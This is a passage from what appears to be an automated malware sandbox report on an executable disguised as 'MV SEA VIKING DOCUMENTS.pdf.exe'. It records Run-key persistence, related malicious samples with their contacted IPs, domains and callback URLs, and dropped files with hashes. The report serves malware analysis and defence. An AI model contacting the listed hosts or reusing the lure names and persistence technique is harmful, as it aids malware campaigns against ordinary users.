                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                    Simulations

                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                    16:53:46AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 1BIHHVSHQZC C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
                                                                                                                                                                                    16:53:54AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 1BIHHVSHQZC C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe

                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                    IPs

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    154.23.172.38BANK INFORMATION-M017012022-017016.gz.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • www.7bkj.com/be4o/?gH=2H0l+vShTragceHLGIuOAM6EcVRszlgpd1g39MbiOsu7jwlookSoZaEGSNynu3NI9Twz&v0Gl=jBApARJ
                                                                                                                                                                                    35.214.4.70VC-Q-1056410-21GR1.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • www.ygraeriotexniki.com/epns/?Cn9Tj=FTz65ioNXGr/bYyW04W4zIfroZwzc0QuNijJrj1ammqxW8Zv64FK7Bc848zHsVnHheC0&GPWTV4=g6ApcZ98ddiLj
                                                                                                                                                                                    64.32.22.102nideGet hashmaliciousBrowse
                                                                                                                                                                                    • json.hellomeyou.cyou/
                                                                                                                                                                                    r#U00e1pida confirmaci#U00f3n.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • www.opurtnsdqr.icu/ariv/?3f3pG=DDH8uZt82fFxN&w4=XX9ZxwvUDw+3jZ22q7i7QDxUyPsfesr7+k/3E3v3b68BN9YXBo7R2SXb6N4W3m4iV9wM
                                                                                                                                                                                    E-Invoice No 11073490.eml.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • www.needtravel.club/sc9s/?2dwdzJ0=mGIyzaocmfpCJuIDbtrOoabZiHPi/yIkNlf95VavyONx2wUqm9ePahTOMt2ohG8T/Naf&8pv=4hCLV
                                                                                                                                                                                    DO 2168569 2172145000025112021.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • www.2pnlx3.biz/u0n0/?XT=R+QTGL5xbntduc+Tkv3wOL/BuTNCQpgntev44CMSBbEUgxiAzHjKp8GWQ0KMS78Inf5l&-ZeHzN=EFNTZbwH9lltwDVp
                                                                                                                                                                                    REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • www.digiranch.club/p0se/?m2M=MB6mc2+rjJBDv3vjjaJKYCbGKed+LlfFNN0ZlziVmcxlQq4jHg390pg4qHsmiwoXqZ2j&ER=hZyp8h70J
                                                                                                                                                                                    PRICE REQUEST 40 ft container x2.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                    • www.newjerseyreosales.com/n8ba/?_pp8FF=sZJLicG82WeXXCPWs/7wGk6eNMJ9cMSCQNbpq4+LTsK0aCIG1a8yNmSN9n87qq59hWd1Eg==&p8Y8=mT0xlL38IP
                                                                                                                                                                                    Payment_Advice.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • www.somerderm.com/uecu/?Hnzh=8U+EXqSmfv45C6ynoIvrBZ0K8Dr3OVW/Ywyk0283jnITB/KpiIlh2KnAqekFp8WJHMsVHq5FnQ==&r0=nN64u4vhFXdxw
                                                                                                                                                                                    eQLPRPErea.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • www.serversexposed.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=BTUR3n/6oIRf9T7Z05GVe/Yy9bfPjZd+/OGeJHu++OIAwxof8xfoUtHRcnIR2ViXQlpe
                                                                                                                                                                                    UTcQK0heAfGWTLw.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • www.fightersimple.com/cpo/?-Z=IYEDT7LIVPAEFSvpWPQrei2KMZ5msAfYwwB4VsqPLY3mlXL4Mc7uXQivRyD8uUnKlez8&s6=X48TaZGP
                                                                                                                                                                                    RDAW-180-47D.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • www.mycardsir.com/fhg5/?k2Jdl2Q=HeTTXP/NkEHJWkwe78ofmopYz3/32tfd/RFLa1LkCks8JnbpmwWf2RXTve9KXxT7fo8e&OZiLRb=AnG0VF1hLTBpLbaP
                                                                                                                                                                                    New -PO January.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                    • www.merchandisingpremium.com/kgw/?y488D=PXWbyoUzr4MJinE4GWmQER2GvkxLFP7ZxA7zcsAdloYaMpm0+Ia9+8OgHYWAj44PGeVKiA==&_L34=kt84IRmHLXo
                                                                                                                                                                                    PRODUCT INQUIRY BNQ1.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                    • www.4winner.xyz/coz3/?RFN4=FzJRfMhRMKbZZb1P0fjURHKUBPNrbzlUUrVaU7rnUM0+6b/b9R1IlXJUUDQo3ufkoD7CqQ==&RB=NL00JzKhBv9HkNRp
                                                                                                                                                                                    New Additional Agreement.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • www.candleish.com/bw82/?8p=HzkSLFojSME3Bv2BRvsWxyeIaLE0Ahb/E/vGPx+3dizfQAeoNzC3oLrNAv5ZQdjmcdMFR+JtKQ==&Bh=H0GxrDp
                                                                                                                                                                                    Qaizen19.10.2020.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • www.onfunerals.net/dn87/?uV0xpr=OPfuvpkPgXuNNyPKiMIIexDYDnMJ5972QfRTwhIurpIeU7r1I5tVqFnt6OT4nh1SyNyl&0r_4=vDKxhJ1xlHYTRvA
                                                                                                                                                                                    New Purchase Order 50,689$.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • www.4winner.xyz/eao/?Yvux40tX=2eKuYykfKT6E0YrQApY5J4vDJiqOigtFaVbxWGoO7nVxUHKG519x/DeD7eAt21vA2f7Y&Pp=jfLprdxxs
                                                                                                                                                                                    Rechnungsbeleg.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • www.getscholardollars.com/d2w/

                                                                                                                                                                                    Domains

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    www.nagradi7.comPI-003406022022.qdf.gz.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.214.67.115
                                                                                                                                                                                    sslhosting.simplesite.comTZtL1H5sPw.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 54.154.44.39
                                                                                                                                                                                    SWIFT Message.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                    • 34.242.161.146
                                                                                                                                                                                    SHIPPING-DOC.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                    • 54.154.44.39
                                                                                                                                                                                    h1JhYRRmqw.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 34.242.161.146
                                                                                                                                                                                    1908790.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 34.250.168.42
                                                                                                                                                                                    PO_#10292132.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 34.250.168.42
                                                                                                                                                                                    F30AGnBthja6Ka2.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 34.250.168.42
                                                                                                                                                                                    vYdNoArXo0.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 54.154.44.39
                                                                                                                                                                                    P.O Turkey_51021.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 34.242.161.146
                                                                                                                                                                                    M2021-D-074.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 34.250.168.42
                                                                                                                                                                                    Bank Payment Details.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 34.242.161.146
                                                                                                                                                                                    Req Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 34.242.161.146
                                                                                                                                                                                    Purchase Orders.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 34.250.168.42
                                                                                                                                                                                    igPVY6UByI.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 54.154.44.39
                                                                                                                                                                                    bank details.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 34.250.168.42
                                                                                                                                                                                    Drawings2.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 54.154.44.39
                                                                                                                                                                                    PURCHASE ORDER_no. 64392094_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 34.242.161.146
                                                                                                                                                                                    WhTpMNHuhn.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 34.250.168.42
                                                                                                                                                                                    shops.myshopify.comFacture d'achat.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    Sewoong Ref No. AESVN-801-GY.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    #Ud55c#Ub77c#Uc0b0#Uc5c5#Uac1c#Ubc1c(2022.02.21).vbsGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    Seznam narocil.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    New order list.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    DHL_2000212221.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    85cqP99gWK.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    ghhjdhsssaj.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    ICM Player Offer.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    february order.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    Detalles del banco.pdf.z.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    DHL20002.EXEGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    #Ud55c#Ub77c#Uc0b0#Uc5c5#Uac1c#Ubc1c(2022.02.17).vbsGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    Order file No 3390227 021622.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    TNT Original Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    Lista de orden.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    DELIVERY DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    IRQ2107799_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    2AODIMMAidbki_ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74
                                                                                                                                                                                    mWXWZmire6.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 23.227.38.74

                                                                                                                                                                                    ASNs

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    GOOGLE-2USdgXu58zvGO.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.214.125.22
                                                                                                                                                                                    ow6kXHwzLl.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.209.10.220
                                                                                                                                                                                    simple_georgia_rental_agreement 18320 .jsGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.206.117.64
                                                                                                                                                                                    Bank Swift Copy.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.209.10.220
                                                                                                                                                                                    umbrella_isda_master_agreement 53344 .jsGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.206.117.64
                                                                                                                                                                                    indemnity_policy_for_lack_of_section_38_agreement 71293 .jsGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.206.117.64
                                                                                                                                                                                    united_trust_agreement_template 54802 .jsGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.206.117.64
                                                                                                                                                                                    what_is_the_difference_between_a_consent_decree_and_a_settlement_agree 99678 .jsGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.206.117.64
                                                                                                                                                                                    what_is_the_difference_between_a_pledge_agreement_and_a_security_agree 83645 .jsGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.206.117.64
                                                                                                                                                                                    attach.htmlGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.211.178.172
                                                                                                                                                                                    western_canada_lottery_corporation_group_buying_agreement_form 96969 .jsGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.206.117.64
                                                                                                                                                                                    hc5uWKhXjO.jsGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.206.117.64
                                                                                                                                                                                    hc5uWKhXjO.jsGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.206.117.64
                                                                                                                                                                                    payment receipt.02082022.doc.docGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.214.78.250
                                                                                                                                                                                    Swift MT103.docGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.208.47.90
                                                                                                                                                                                    Bpyfo34SYPGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.218.52.161
                                                                                                                                                                                    successor_custodian_of_medical_records_agreement 51369 .jsGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.206.117.64
                                                                                                                                                                                    wCohHfehBD.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.215.183.109
                                                                                                                                                                                    IMG 29987 SHIPMENT Order 85 3.02.2022.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.209.61.15
                                                                                                                                                                                    SHIPPING INVOICE DOCUMENTS.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 35.214.125.22
                                                                                                                                                                                    COGENT-174USmips-20220221-0449Get hashmaliciousBrowse
                                                                                                                                                                                    • 154.62.137.64
                                                                                                                                                                                    arm-20220221-0449Get hashmaliciousBrowse
                                                                                                                                                                                    • 38.162.129.238
                                                                                                                                                                                    x86-20220221-0419Get hashmaliciousBrowse
                                                                                                                                                                                    • 38.46.73.168
                                                                                                                                                                                    K5LXSGIoKRGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.42.81.22
                                                                                                                                                                                    3sFLjv3aWPGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.24.24.137
                                                                                                                                                                                    zEqcR6NjKcGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.24.24.129
                                                                                                                                                                                    6V9uZ6cydeGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.7.203.202
                                                                                                                                                                                    apep.arm7Get hashmaliciousBrowse
                                                                                                                                                                                    • 154.42.81.26
                                                                                                                                                                                    apep.x86Get hashmaliciousBrowse
                                                                                                                                                                                    • 154.21.136.158
                                                                                                                                                                                    n1QctxXsbNGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.24.217.175
                                                                                                                                                                                    N698PtJ97OGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.42.56.67
                                                                                                                                                                                    bFSG6nzHxTGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.60.6.228
                                                                                                                                                                                    hSVdBsYfVZGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.18.45.173
                                                                                                                                                                                    MPmlYCqcu5Get hashmaliciousBrowse
                                                                                                                                                                                    • 38.116.189.128
                                                                                                                                                                                    igBoEOxQatGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.28.148.127
                                                                                                                                                                                    yLtgB0ly0lGet hashmaliciousBrowse
                                                                                                                                                                                    • 154.29.84.53
                                                                                                                                                                                    apep.arm7Get hashmaliciousBrowse
                                                                                                                                                                                    • 154.42.81.26
                                                                                                                                                                                    2QMYcuMjVdGet hashmaliciousBrowse
                                                                                                                                                                                    • 206.0.89.195
                                                                                                                                                                                    ZFfFGabP4PGet hashmaliciousBrowse
                                                                                                                                                                                    • 66.28.136.42
                                                                                                                                                                                    BdsJPbiWybGet hashmaliciousBrowse
                                                                                                                                                                                    • 38.230.129.84

                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19PAYMENT_.EXEGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    Remittance Advice 703185.htmlGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    PagoCaptura.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    TOMAS _ 21ST_FEBRUARY_2022 _.HTMLGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    U3889.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    Y98384.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    Fax_File.htmlGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    Odeme_Ekran_g#U00f6r#U00fcnt#U00fcs#U00fc.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    SC#22-SPFEB-136.docxGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    Liquidacin por Factorizacin de Crditos.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    3sahn6iSSi.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    TNT Invoice 21-02-2022#U00b7pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    OdemeEkrang#U00f6r#U00fcnt#U00fcs#U00fc.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    ORDER#4900645.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    Office.htmlGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    WQVPQI8Wp1.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    NWM1TBrwfP.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    discord.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    9d6bmcIk0R.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161
                                                                                                                                                                                    9d6bmcIk0R.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.185.174
                                                                                                                                                                                    • 142.250.185.161

                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dllMV SEA VIKING DOCUMENTS.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                      IMG140202214020221402022.exeGet hashmaliciousBrowse
                                                                                                                                                                                        Liquidacin por Factorizacin de Crditos.exeGet hashmaliciousBrowse
                                                                                                                                                                                          Liquidacin por Factorizacin de Crditos.exeGet hashmaliciousBrowse
                                                                                                                                                                                            36PzmSKXoT.exeGet hashmaliciousBrowse
                                                                                                                                                                                              36PzmSKXoT.exeGet hashmaliciousBrowse
                                                                                                                                                                                                TNT Invoice 21-02-2022#U00b7pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  TNT Invoice 21-02-2022#U00b7pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    Order (965155).exeGet hashmaliciousBrowse
                                                                                                                                                                                                      Order (965155).exeGet hashmaliciousBrowse
                                                                                                                                                                                                        b4#Uc6a9.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          CDH_0302 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            CDH_0302 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                              OFERTA ALSSET.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                OFERTA ALSSET.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  OFERTA ALSSET.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                    Invitation To Quote 17-02-2022#U00b7pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      Invitation to Quote 17-02-2022#U00b7pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                        Invitation To Quote 17-02-2022#U00b7pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                          Invitation to Quote 17-02-2022#U00b7pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\cliconfg.dllMV SEA VIKING DOCUMENTS.pdf.exeGet hashmaliciousBrowse

                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\DB1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):45056
                                                                                                                                                                                                                              Entropy (8bit):0.7853305971874845
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43b/DVIIgyZKLk8s8LKvUf9K4UKTgyJqhtcebVEq8Ma0D0HOlcjlGxdKmtAONu41:Sb+uKLyeym/grcebn8MouOjlGxdKmt3N
                                                                                                                                                                                                                              MD5:00C036C61F625BF9D25362B9BE24ADEB
                                                                                                                                                                                                                              SHA1:6738C3D037E4A2E9F41B1398BA88E5771532F593
                                                                                                                                                                                                                              SHA-256:0C187B091E99E5BB665C59F8F8E027D5658904B32E4196D2EB402F3B1CAD69EF
                                                                                                                                                                                                                              SHA-512:711265BC8C1653BF6E862343BF3149A2AB09F4BA7D38E2D8A437001DB6C0F1936F6362571DD577CD7BDBEEC766DF141CB7E0681512C12E25A99CDB71731232D1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\E6l40hhe\shmhprg0nvltzt.exe

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):628784
                                                                                                                                                                                                                              Entropy (8bit):7.669364566747911
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:9b6UG1NAN8Axjam22QMPnJjUisvEe/8dUMq2PZgue0yzgX3GXUe:9bm1YfV2vhvEeUdUgPZgpgXWXR
                                                                                                                                                                                                                              MD5:319860D181378BF868E4DEEDCF5FBFB6
                                                                                                                                                                                                                              SHA1:CF91EFDA8BDBA4674CB72D33CE391241EC4B9678
                                                                                                                                                                                                                              SHA-256:58F1715336D2B7478C4539589DFC2065B3201DF5505756474E00636B432CB378
                                                                                                                                                                                                                              SHA-512:F27D1C40321D87043BDFC5FB8A6B8B049D2C0CB15AD32CF9518E45875C1DA225D25DE19BB9D58588EC47BBAC900342ED8C5A732C9131EA558A6AE6682CB783E7
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 14%
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@..................................g....@............................................................p............................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...p...`...........................rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Stuffiness7.dat

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):80902
                                                                                                                                                                                                                              Entropy (8bit):5.976267305529194
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:jROzIZ2BBjXU7otVipiINRcjHLazNO9z8Ul58:lOzIZ2BpXU7oHyx6ANYt58
                                                                                                                                                                                                                              MD5:F610642FCF0D4FB10E1D6E92BAB1C03C
                                                                                                                                                                                                                              SHA1:EE2B377B460FE13059E7E86DAF25AB702457D4F7
                                                                                                                                                                                                                              SHA-256:759808B739C0BA9D5FC1FFDF0A1F93F23CF4AD0A2C58174D35B7521B298BAA7A
                                                                                                                                                                                                                              SHA-512:3A9B33292DF407EB5DD0EA094E8CA57CAA59623A64C729F982D98B8B5FE209F3AB33E96A74140D2282BC2C9FF29571AD811A24F3C319C215E8CBB60E9584E135
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:f.`.."6.W...................................Z...b..%.j.Hggggggggggggggggggggggggggggggggg.I.C[..f....-..............................................Xjf...w.).B*[.......................................W.....2.FUV........................................................6.u/......................................................_..f....+m.@a=======================================..J........0.i.3................................................&z.7z..................................4.W.a.....3!K.,<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<C......)?.6......................................Cf.t....7Sc.K...................................................C......6D..;..................................................C......0..a1..............................................,....q.\.../.6.[.............................................k......."..6....................................*...%WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW.....=......%. .a..................................6.U2..f...

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\cliconfg.dll

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):78336
                                                                                                                                                                                                                              Entropy (8bit):5.26970327331065
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:NrVe9TYPg/NGXIQgD78A5A/33EcLl3Je8yu9SDWCZ3PrIfd+8Ec:NBDgwXIFD78A5O3EchtC3PrIfd+f
                                                                                                                                                                                                                              MD5:5AE732C0CBD2DE4157BA6273579DB241
                                                                                                                                                                                                                              SHA1:77724558F2B36644D9DBB228D5A6000BB26D6666
                                                                                                                                                                                                                              SHA-256:BB1C2BD6E5BF047077C0EE742CDAC75BC89F212C47610CF1B2F2F1755F0A4F8B
                                                                                                                                                                                                                              SHA-512:46243CE749A2DB2D1965CC7AD783A84AA317B0E129B894AE2BAEC652AE18D7D4D7FD193F86610E9021DB979C9993C0958B60275EC05A0540BBB8973E4D79C536
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                              • Filename: MV SEA VIKING DOCUMENTS.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.H.)c&.)c&.)c&.=.".%c&.=.%.+c&.)c'.Gc&.=.'.$c&.=.&.(c&.=...%c&.=...(c&.=.$.(c&.Rich)c&.................PE..L...)cs............!................................................................^.....@A........................`................... .......................T...0...T............................................................................text............................... ..`.data...d........H..................@....idata.. ...........................@..@.rsrc... ...........................@..@.reloc..T............"..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                                              Entropy (8bit):5.814115788739565
                                                                                                                                                                                                                              Encrypted:false
